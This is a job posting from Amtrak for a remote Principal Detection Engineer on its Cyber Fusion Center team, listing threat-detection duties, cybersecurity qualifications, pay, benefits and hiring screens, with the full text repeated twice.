Amtrak
Principal Detection Engineer - 90397456 - Remote
Amtrak, Washington, District of Columbia, us, 20022
Overview
Your success is a train ride away! As we move America's workforce toward the future, Amtrak connects businesses and communities across the country. We employ more than 20,000 diverse, energetic professionals in a variety of career fields throughout the United States. The safety of our passengers, our employees, the public and our operating environment is our priority, and the success of our railroad is due to our employees. Are you ready to join our team? Our values of 'Do the Right Thing, Excel Together and Put Customers First' are at the heart of what matters most to us, and our Core Capabilities, 'Building Trust, Accountability, Effective Communication, Customer Focus, and Proactive Safety & Security' are what every employee needs to know and do to be most impactful at Amtrak. By living the Amtrak values, focusing on our capabilities, and actively embracing and fostering diverse ideas, backgrounds, and perspectives, together we will honor our past and make Amtrak a company of the future.
Summary of Duties
The Detection Engineer will play a critical role transforming the Cyber Fusion Center. If you are someone who enjoys looking through data sets for anomalies, researching malware, reading up on the latest adversary's techniques, tactics, and procedures, and trying out new penetration tools and techniques to see what telemetry is generated, this position is for you. Our team's mission is simple: hunt and find threats. Our team's objective is simple: build a threat-informed defense. Our team's goal is simple: excel together.
Essential Functions
Identify relevant data sources to determine threat-detection scenarios and use cases. Engineer specific, yet abstract detectors finding the ideal balance between an adversary's tactics, techniques, and procedures (TTPs). Automate threat-detection scenarios and use cases to improve Cyber Incident Response workflows. Provide Cyber Fusion Enablement for Detection Improvement Requests (DIR). Build threat detection models identifying relevant threats leveraging the Detection Development Lifecycle, Threat Detection Maturity and Alerting and Detection Strategy (ADS) Frameworks. Assess the effectiveness of threat detection practices and countermeasures across the Enterprise infrastructure and applications. Perform Cyber Fusion technology detection gap assessments, assist with developing the strategic enhancement roadmap. Participate in planning sessions related to Enterprise projects or new technologies to implement process improvement within the functional area.
Minimum Qualifications
Bachelor's Degree in Computer Science, Information Systems, Software Engineering, Software Development, Applied Data Science and Machine Learning, or relevant field, and relevant experience in Cybersecurity. Experience with scripting, object-oriented programming, coding, or infrastructure-as-code (IaC). Ability to think critically and like threat actors. Ability to communicate complex information clearly through verbal, written, and/or visual means. Ability to evaluate, analyze, and synthesize large quantities of data into high quality threat detectors. Knowledge of MITRE ATT&CK, Mobile, and ICS Frameworks or equivalent. Knowledge of MITRE ATT&CK Navigator or equivalent. Knowledge of MITRE Engage and Defend Frameworks or equivalent. Skill in using multiple analytic tools, databases, and techniques (e.g., Analyst's Notebook, link charts, matrices, etc.). Skill to analyze and assess internal and external partner cyber operations capabilities and tools. Skill in providing understanding of target or threat systems through identification and link analysis of relationships.
Preferred Qualifications
Cybersecurity certifications, courses, or hands-on experience with Red Team Operations and Adversary Emulation; Penetration Testing, Exploit Writing, and Ethical Hacking; Offensive Security, Security Operations, Web Application Testing, or Cloud Security; Reverse-Malware Engineering; Digital Forensics and Incident Response; Cyber Deception - Attack Detection, Disruption, Active Defense; Applied Data Science and Machine Learning for Cybersecurity Professionals. Experience applying Threat Hunting methodologies which are Intelligence-Hypothesis driven with sound scientific-methodology principles. Preferred knowledge of Operational Technology (OT), Industrial Control Systems (ICS) or SCADA systems, but not required.
Preferred 11+ years of relevant experience in Cybersecurity. Preferred 3+ years of relevant experience with scripting, object-oriented programming, coding, or infrastructure-as-code (IaC).
Work Environment
100% Remote. May require occasional travel up to 25% of the time. May require occasional on-call status. May require occasional after hours, weekend, or periodic shift work supporting a 24x7x365 Cyber Fusion Center.
Communications and Interpersonal Skills
Must have excellent oral and written communication skills.
The salary/hourly range is $124,600-$161,352. Pay is based on several factors including education, work experience, certifications, internal equity, etc. Depending on location, geo-pay differential may be applied. Amtrak may offer incentive and pay programs including a short-term incentive bonus and long-term incentive plan compensation. In addition to salary, Amtrak offers a comprehensive benefits package including health, dental, and vision plans; health savings accounts; wellness programs; flexible spending accounts; 401K with employer match; life insurance; short- and long-term disability; paid time off; back-up care; adoption assistance; surrogacy assistance; reimbursement of education expenses; Public Service Loan Forgiveness eligibility; Railroad Retirement benefits; and rail pass privileges. Learn more about our benefits offerings here.
Requisition ID: 165097
Work Arrangement:
02-Remote Optional Relocation Offered: No Travel Requirements:
Up to 25%
You power our progress through your performance.
We want your work at Amtrak to be more than a job. We want your career at Amtrak to be a fulfilling experience with challenging work, rewarding opportunities, respect among colleagues, and attractive compensation. Amtrak maintains a culture that values high performance and recognizes individual employee contributions.
Amtrak is committed to a safe workplace free of drugs and alcohol. All Amtrak positions require a pre-employment background check that includes prior employment verification, a criminal history check and a pre-employment drug screen. Candidates who test positive for marijuana will be disqualified. Amtrak’s pre-employment drug testing program complies with DOT regulations and applicable law.
In accordance with DOT regulations (49 CFR 40.25), Amtrak is required to obtain prior drug and alcohol testing records for applicants performing safety-sensitive duties. Refusal to provide written consent will result in disqualification from safety-sensitive functions.
In accordance with federal law governing security checks for public transportation providers, Amtrak screens applicants for disqualifying criminal offenses.
Note that any education requirement may be satisfied by equivalent education, training and experience.
Amtrak is an equal opportunity employer and all qualified applicants will receive consideration without regard to race/color, religion, sex, national origin/ethnicity, disability, veteran status, marital status, sexual orientation, gender identity, or any other protected characteristic.
#J-18808-Ljbffr
Your success is a train ride away! As we move America's workforce toward the future, Amtrak connects businesses and communities across the country. We employ more than 20,000 diverse, energetic professionals in a variety of career fields throughout the United States. The safety of our passengers, our employees, the public and our operating environment is our priority, and the success of our railroad is due to our employees. Are you ready to join our team? Our values of 'Do the Right Thing, Excel Together and Put Customers First' are at the heart of what matters most to us, and our Core Capabilities, 'Building Trust, Accountability, Effective Communication, Customer Focus, and Proactive Safety & Security' are what every employee needs to know and do to be most impactful at Amtrak. By living the Amtrak values, focusing on our capabilities, and actively embracing and fostering diverse ideas, backgrounds, and perspectives, together we will honor our past and make Amtrak a company of the future.
Summary of Duties
The Detection Engineer will play a critical role transforming the Cyber Fusion Center. If you are someone who enjoys looking through data sets for anomalies, researching malware, reading up on the latest adversary's techniques, tactics, and procedures, and trying out new penetration tools and techniques to see what telemetry is generated, this position is for you. Our team's mission is simple: hunt and find threats. Our team's objective is simple: build a threat-informed defense. Our team's goal is simple: excel together.
Essential Functions
Identify relevant data sources to determine threat-detection scenarios and use cases. Engineer specific, yet abstract detectors finding the ideal balance between an adversary's tactics, techniques, and procedures (TTPs). Automate threat-detection scenarios and use cases to improve Cyber Incident Response workflows. Provide Cyber Fusion Enablement for Detection Improvement Requests (DIR). Build threat detection models identifying relevant threats leveraging the Detection Development Lifecycle, Threat Detection Maturity and Alerting and Detection Strategy (ADS) Frameworks. Assess the effectiveness of threat detection practices and countermeasures across the Enterprise infrastructure and applications. Perform Cyber Fusion technology detection gap assessments, assist with developing the strategic enhancement roadmap. Participate in planning sessions related to Enterprise projects or new technologies to implement process improvement within the functional area.
Minimum Qualifications
Bachelor's Degree in Computer Science, Information Systems, Software Engineering, Software Development, Applied Data Science and Machine Learning, or relevant field, and relevant experience in Cybersecurity. Experience with scripting, object-oriented programming, coding, or infrastructure-as-code (IaC). Ability to think critically and like threat actors. Ability to communicate complex information clearly through verbal, written, and/or visual means. Ability to evaluate, analyze, and synthesize large quantities of data into high quality threat detectors. Knowledge of MITRE ATT&CK, Mobile, and ICS Frameworks or equivalent. Knowledge of MITRE ATT&CK Navigator or equivalent. Knowledge of MITRE Engage and Defend Frameworks or equivalent. Skill in using multiple analytic tools, databases, and techniques (e.g., Analyst's Notebook, link charts, matrices, etc.). Skill to analyze and assess internal and external partner cyber operations capabilities and tools. Skill in providing understanding of target or threat systems through identification and link analysis of relationships.
Preferred Qualifications
Cybersecurity certifications, courses, or hands-on experience with Red Team Operations and Adversary Emulation; Penetration Testing, Exploit Writing, and Ethical Hacking; Offensive Security, Security Operations, Web Application Testing, or Cloud Security; Reverse-Malware Engineering; Digital Forensics and Incident Response; Cyber Deception - Attack Detection, Disruption, Active Defense; Applied Data Science and Machine Learning for Cybersecurity Professionals. Experience applying Threat Hunting methodologies which are Intelligence-Hypothesis driven with sound scientific-methodology principles. Preferred knowledge of Operational Technology (OT), Industrial Control Systems (ICS) or SCADA systems, but not required.
Preferred 11+ years of relevant experience in Cybersecurity. Preferred 3+ years of relevant experience with scripting, object-oriented programming, coding, or infrastructure-as-code (IaC).
Work Environment
100% Remote. May require occasional travel up to 25% of the time. May require occasional on-call status. May require occasional after hours, weekend, or periodic shift work supporting a 24x7x365 Cyber Fusion Center.
Communications and Interpersonal Skills
Must have excellent oral and written communication skills.
The salary/hourly range is $124,600-$161,352. Pay is based on several factors including education, work experience, certifications, internal equity, etc. Depending on location, geo-pay differential may be applied. Amtrak may offer incentive and pay programs including a short-term incentive bonus and long-term incentive plan compensation. In addition to salary, Amtrak offers a comprehensive benefits package including health, dental, and vision plans; health savings accounts; wellness programs; flexible spending accounts; 401K with employer match; life insurance; short- and long-term disability; paid time off; back-up care; adoption assistance; surrogacy assistance; reimbursement of education expenses; Public Service Loan Forgiveness eligibility; Railroad Retirement benefits; and rail pass privileges. Learn more about our benefits offerings here.
Requisition ID: 165097
Work Arrangement:
02-Remote Optional Relocation Offered: No Travel Requirements:
Up to 25%
You power our progress through your performance.
We want your work at Amtrak to be more than a job. We want your career at Amtrak to be a fulfilling experience with challenging work, rewarding opportunities, respect among colleagues, and attractive compensation. Amtrak maintains a culture that values high performance and recognizes individual employee contributions.
Amtrak is committed to a safe workplace free of drugs and alcohol. All Amtrak positions require a pre-employment background check that includes prior employment verification, a criminal history check and a pre-employment drug screen. Candidates who test positive for marijuana will be disqualified. Amtrak’s pre-employment drug testing program complies with DOT regulations and applicable law.
In accordance with DOT regulations (49 CFR 40.25), Amtrak is required to obtain prior drug and alcohol testing records for applicants performing safety-sensitive duties. Refusal to provide written consent will result in disqualification from safety-sensitive functions.
In accordance with federal law governing security checks for public transportation providers, Amtrak screens applicants for disqualifying criminal offenses.
Note that any education requirement may be satisfied by equivalent education, training and experience.
Amtrak is an equal opportunity employer and all qualified applicants will receive consideration without regard to race/color, religion, sex, national origin/ethnicity, disability, veteran status, marital status, sexual orientation, gender identity, or any other protected characteristic.
#J-18808-Ljbffr